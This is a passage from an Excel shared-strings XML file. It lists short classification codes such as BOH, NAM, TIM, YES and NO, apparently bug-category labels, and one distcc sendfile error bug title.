    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>distcc says: (dcc_pump_sendfile) ERROR: sendfile returned 0? can't cope (bisected)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NUM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
